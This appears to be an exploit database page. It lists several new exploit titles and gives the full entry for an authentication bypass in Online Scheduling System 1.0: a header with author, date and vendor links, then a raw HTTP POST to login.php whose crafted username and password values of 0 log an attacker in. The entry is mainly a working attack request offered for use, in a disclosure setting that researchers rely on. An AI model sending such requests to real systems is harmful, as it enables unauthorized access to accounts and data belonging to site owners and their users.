
9 changes to exploits/shellcodes VirtualTablet Server 3.0.2 - Denial of Service (PoC) Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit) ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting Online Scheduling System 1.0 - Persistent Cross-Site Scripting php-fusion 9.03.50 - Persistent Cross-Site Scripting Super Backup 2.0.5 for iOS - Directory Traversal HardDrive 2.1 for iOS - Arbitrary File Upload Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) Online Scheduling System 1.0 - Authentication Bypass
15 lines
No EOL
674 B
Text
15 lines
No EOL
674 B
Text
# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass
|
|
# Exploit Author: Bobby Cooke
|
|
# Date: 2020-04-30
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
|
|
|
|
# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1
|
|
POST /Online%20Scheduling%20System/login.php HTTP/1.1
|
|
Host: TARGET
|
|
Connection: close
|
|
Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60
|
|
|
|
username=0&password=0&lgn=Login |